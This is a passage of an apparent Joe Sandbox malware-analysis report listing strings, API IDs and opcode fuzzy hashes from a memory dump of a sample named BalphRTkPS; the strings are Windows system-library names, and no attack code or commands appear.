                                                                                                              • LdrResSearchResource Exit, xrefs: 0173AA25
                                                                                                              • LdrResSearchResource Enter, xrefs: 0173AA13
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                              • API String ID: 0-4066393604
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `$`
                                                                                                              • API String ID: 0-197956300
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Legacy$UEFI
                                                                                                              • API String ID: 2994545307-634100481
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$MUI
                                                                                                              • API String ID: 0-17815947
                                                                                                              Strings
                                                                                                              • kLsE, xrefs: 01730540
                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0173063D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                              • API String ID: 0-2547482624
                                                                                                              Strings
                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0173A2FB
                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0173A309
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                              • API String ID: 0-2876891731
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MUI
                                                                                                              • API String ID: 0-1339004836
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalTags
                                                                                                              • API String ID: 0-1106856819
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .mui
                                                                                                              • API String ID: 0-1199573805
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AlternateCodePage
                                                                                                              • API String ID: 0-3889302423
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryHash
                                                                                                              • API String ID: 0-2202222882
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #
                                                                                                              • API String ID: 0-1885708031
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryName
                                                                                                              • API String ID: 0-215506332
                                                                                                              Strings
                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017B895E
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                              • API String ID: 0-702105204
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bc23c606a3d059d7f039a67c3dd80c3a322e503a007e49fecdfc210562323ab
                                                                                                              • Instruction ID: 87ad28ca5e0b3cf6bfdf7157e9486b6137bd61ff950508f0d2ca4edf1088d241
                                                                                                              • Opcode Fuzzy Hash: 4bc23c606a3d059d7f039a67c3dd80c3a322e503a007e49fecdfc210562323ab
                                                                                                              • Instruction Fuzzy Hash: FBA1AE71B0061ADBDF25CF69C990BAAF7F1FF56318F104129EA4597282EB34E911CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 53cd26e53e7d16ab0b39d359e75da08a52af6bb856c459e38d8e9c091abbd565
                                                                                                              • Instruction ID: 7111ecdb8ca8ce08bd7056a6b660a96df40f2d6ec77fe1cdf2d86f4ac66976ca
                                                                                                              • Opcode Fuzzy Hash: 53cd26e53e7d16ab0b39d359e75da08a52af6bb856c459e38d8e9c091abbd565
                                                                                                              • Instruction Fuzzy Hash: EAA1CC72A406169FD762DF18CD84B2ABBE9FF48304F154928F689DB691D334EE00CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e2b7c6e8bf27dbc3934245016117a1ec0730b1876f22cd47ee730bccd7004173
                                                                                                              • Instruction ID: a523a6030ad6e77bb762f385853046e46b91744d8c496acee737b97bb2a75b22
                                                                                                              • Opcode Fuzzy Hash: e2b7c6e8bf27dbc3934245016117a1ec0730b1876f22cd47ee730bccd7004173
                                                                                                              • Instruction Fuzzy Hash: B4919E71E0521AAFDB15CFA8D8C4BEEFBB5AB48710F154169FB11AB241D734E9009BA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 12ad3a59a1b3e1e4a44f3ee12de71ac19b78669f6fd18194f071d9f6d0cb86ee
                                                                                                              • Instruction ID: f1d7da1cae80a02c6168199de121c01864480c26f902bfd81bea54c289e5e5cb
                                                                                                              • Opcode Fuzzy Hash: 12ad3a59a1b3e1e4a44f3ee12de71ac19b78669f6fd18194f071d9f6d0cb86ee
                                                                                                              • Instruction Fuzzy Hash: 67911331A00612CBEB25DB6CD884B79FBA1FF94724F2540A9EE059B345FB38D941CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cb371ad99f037dd2403354b882bd701922bf6b6662b00ef64b1b685b24de08ba
                                                                                                              • Instruction ID: f0b0d61c88f7dded8689e59ab2b5869ff542fa272a84544cbd8ebe0852cd2d1a
                                                                                                              • Opcode Fuzzy Hash: cb371ad99f037dd2403354b882bd701922bf6b6662b00ef64b1b685b24de08ba
                                                                                                              • Instruction Fuzzy Hash: 38818071A00616ABDB25DFA9C840ABEFBF9FB48700F14852EF555E7640E734E940CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction ID: 887fdb5d85dfeb2d46ee3cdf3589d5ad9a9b12f616b5a7004e47a36f6f2491ae
                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction Fuzzy Hash: 49816131A0020A9FDF19DF98C894AAFFBB6BF84310F14856DDA1A9B385D734E941CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cdf773070e86b3f38fdb8466ee196d80dd816e4c046b2aace1680f948f0891a8
                                                                                                              • Instruction ID: b2641d511d958177ffce209c86e261251e9623ee9564af40977263497ab643e7
                                                                                                              • Opcode Fuzzy Hash: cdf773070e86b3f38fdb8466ee196d80dd816e4c046b2aace1680f948f0891a8
                                                                                                              • Instruction Fuzzy Hash: 45718671684742ABDB21EF29C980B7AF7E4BB84258F044929FB55D7240E731E984CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e122d0d639e12cf4a91a7052b326cc970223d8e54406092da15223cef09188ad
                                                                                                              • Instruction ID: 42a5de9d5759987f98b9c51aa290335c1444bf105276d659e3a3c44fc4c17ec7
                                                                                                              • Opcode Fuzzy Hash: e122d0d639e12cf4a91a7052b326cc970223d8e54406092da15223cef09188ad
                                                                                                              • Instruction Fuzzy Hash: CA816275900609AFDB25CFA9C880BEEFBFAFF88354F144429E955A7250DB30AC55CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6d0530de05d9504f8aeb32c1ab81c4f216001e9ffdde4dad8e0cc2d732917c2e
                                                                                                              • Instruction ID: 904b30e11ca02d192384cafc9819e4025121b3e6e21394a4248aca4871b22869
                                                                                                              • Opcode Fuzzy Hash: 6d0530de05d9504f8aeb32c1ab81c4f216001e9ffdde4dad8e0cc2d732917c2e
                                                                                                              • Instruction Fuzzy Hash: F771ED75D01229DBCB26CF58D8907BEFBB0FF5A710F14819AE942AB350E3309944CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4b4087d3fac73063c55ec54d8c88196c1c1149e30b49feb59697fd95ed62a0b1
                                                                                                              • Instruction ID: 706bbbb7285dc97ce491e4c0b518bf5f22e379ed3e6938bded7d30aeee80b634
                                                                                                              • Opcode Fuzzy Hash: 4b4087d3fac73063c55ec54d8c88196c1c1149e30b49feb59697fd95ed62a0b1
                                                                                                              • Instruction Fuzzy Hash: 8871C0709042669FCB15CF59C844AFAFBF5EF49700F0480ADE994DB202E335EA45CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c25db4125b2f2793808937b638486216ceba0510dd474001050205330fd27e6
                                                                                                              • Instruction ID: b8a384852c24a06ab51ecb7802003ff60ade48da010a15cf1c398c53483d2d4e
                                                                                                              • Opcode Fuzzy Hash: 3c25db4125b2f2793808937b638486216ceba0510dd474001050205330fd27e6
                                                                                                              • Instruction Fuzzy Hash: 3F71BD316046428FD712DF28D484B2AF7E5FF88310F0485AAF899CB756DB34D956CBA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction ID: 3f53e1252f3d3d031fd6ef4f9e65b5579e243ad87d8373dadf89dc58bd90e6a6
                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction Fuzzy Hash: 22714D71A0061AAFDB10DFA9C988FEEFBB9FF48700F104569E505A7294DB34EA41CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2031173d9945cb16472c5961adc050e0f7dc88683ac3c284da33262217ae8fae
                                                                                                              • Instruction ID: 2dfd153313324c6ef133808881cfb8e747c24b9dd980566c3515e3e286b0319c
                                                                                                              • Opcode Fuzzy Hash: 2031173d9945cb16472c5961adc050e0f7dc88683ac3c284da33262217ae8fae
                                                                                                              • Instruction Fuzzy Hash: C071C332240701AFEB329F18C884F66FBA6EF44B60F15492CF6558B3A1D775EA44CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 439d15392287697dee9d07df26c4c4b07ac20d4737a5b52cbbf3b49095e0190d
                                                                                                              • Instruction ID: b83cb229360f365a660c83368fe916f13d9e7d804cc7ee86a4fcbeb266523814
                                                                                                              • Opcode Fuzzy Hash: 439d15392287697dee9d07df26c4c4b07ac20d4737a5b52cbbf3b49095e0190d
                                                                                                              • Instruction Fuzzy Hash: DA81A371A083569FDF29DF58E484B6DFBB1BF88310F164269E9006B286C7749E44CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ca852065825a87f781c390a4e4dfec32de5f450680b947b33f359f4e60a2c1aa
                                                                                                              • Instruction ID: 68dd7974c43737ec2f29a3be2f966b2f37dd2006572f104983b647003068c5b3
                                                                                                              • Opcode Fuzzy Hash: ca852065825a87f781c390a4e4dfec32de5f450680b947b33f359f4e60a2c1aa
                                                                                                              • Instruction Fuzzy Hash: 2351BC71200741DFEB71DF59D888B2AFBE9BB48609F10486DE50287A52DBB4EA44CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a2921a03ee8697887b7f518dd68db04a1be4e3468283bcb07ef79f6e1623448d
                                                                                                              • Instruction ID: 71ea663e3f003a9523a390076cad18093f27286f476be9ef52b90ce62cd807f9
                                                                                                              • Opcode Fuzzy Hash: a2921a03ee8697887b7f518dd68db04a1be4e3468283bcb07ef79f6e1623448d
                                                                                                              • Instruction Fuzzy Hash: 3E412672900202DBDB35DF58D884A5AFBB1FBD8700F14C26AE9019B25BC735D942CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d0c9bfaadbc88ed04973e6cf6e6c010c496b60befeed6442d0f6aad315a8d44
                                                                                                              • Instruction ID: 201e229b2225961bb2b86372fd1b726237c2afd9435b86d1d969539568dd2e1c
                                                                                                              • Opcode Fuzzy Hash: 8d0c9bfaadbc88ed04973e6cf6e6c010c496b60befeed6442d0f6aad315a8d44
                                                                                                              • Instruction Fuzzy Hash: A3417C326083169ED312EF68C840B6BF7E8EF88B54F40092AF984D7250E771DE058B93
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction ID: bd9a932fa14baf9bb2e12b5bf6b93370eedb8edb4d974adf7b0a72a51f94ece2
                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction Fuzzy Hash: 19414A31A00221DBDB31EE688444BBAFB72EB50754F1580AAEA458B645E73A9D81CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aaf003c8079c5f76fa21195542fa2bbbcd170e996f3a002ae9e602450cbab279
                                                                                                              • Instruction ID: a1aa66546517592b1f074ba36d9517436ec7f610d11e2c99374ca3fd7f7c35fc
                                                                                                              • Opcode Fuzzy Hash: aaf003c8079c5f76fa21195542fa2bbbcd170e996f3a002ae9e602450cbab279
                                                                                                              • Instruction Fuzzy Hash: 1F416771A40601EFD721DF18D844B26FBF4FF98714F248A6AE449CB252E771EA42CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction ID: 6f1023ef6720b6c6c3f13e6f8a5dbc75c0da4f74f3228dbf93573edc494fef28
                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction Fuzzy Hash: 87410875A00605EFDB25CF98C980AAAFBF8FF18700B10496DE956D7651E730EA44CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 052d812d5be7e3166019e0266aee554e67760f933118b00880b2d25d37ebf0e4
                                                                                                              • Instruction ID: b5488949cf04637189e613f941c773fb7eb89f486635ecf95736fc052da47352
                                                                                                              • Opcode Fuzzy Hash: 052d812d5be7e3166019e0266aee554e67760f933118b00880b2d25d37ebf0e4
                                                                                                              • Instruction Fuzzy Hash: 1541E2B0501715CFCB22EF28C944B65F7B1FF98310F2482A9CA169B6A7EB309A41CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 49d2022f36183712d690f2b634b3914a967bb7d4a71db8a422391208315206f5
                                                                                                              • Instruction ID: 0f5e4aaa7084292f91a7fc5c01502e1774430bc4c4d7e416820419097d2d81b1
                                                                                                              • Opcode Fuzzy Hash: 49d2022f36183712d690f2b634b3914a967bb7d4a71db8a422391208315206f5
                                                                                                              • Instruction Fuzzy Hash: E33166B1A00345DFDB52CFA8C440799FBF4FB49724F2081AED519EB291D3369A02CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1313209cf0f9b83813d467422f0a85ac5184e13c5e6a2bad0975a6ef1dcff95c
                                                                                                              • Instruction ID: b315732ab7e4fdc2d1ddbd4db880fd11d816bcee7e2c07ad3729901d91aca5ce
                                                                                                              • Opcode Fuzzy Hash: 1313209cf0f9b83813d467422f0a85ac5184e13c5e6a2bad0975a6ef1dcff95c
                                                                                                              • Instruction Fuzzy Hash: 0C4180B25043019FD721DF29C885B9BFBE8FF88654F108A2EF998D7255D7709A04CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 71fa2f13067abb748edeeee8d7ceb0fd530da581d0456fed44a7f4c042f780d7
                                                                                                              • Instruction ID: 4a81d4e2f6874519122130fd04b45eaa571e32bcb021138d8461f87116f274c4
                                                                                                              • Opcode Fuzzy Hash: 71fa2f13067abb748edeeee8d7ceb0fd530da581d0456fed44a7f4c042f780d7
                                                                                                              • Instruction Fuzzy Hash: 4C41DF726046429FC320DF68C884BABF7F9BFC8700F140A29F99487680E730E914C7A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
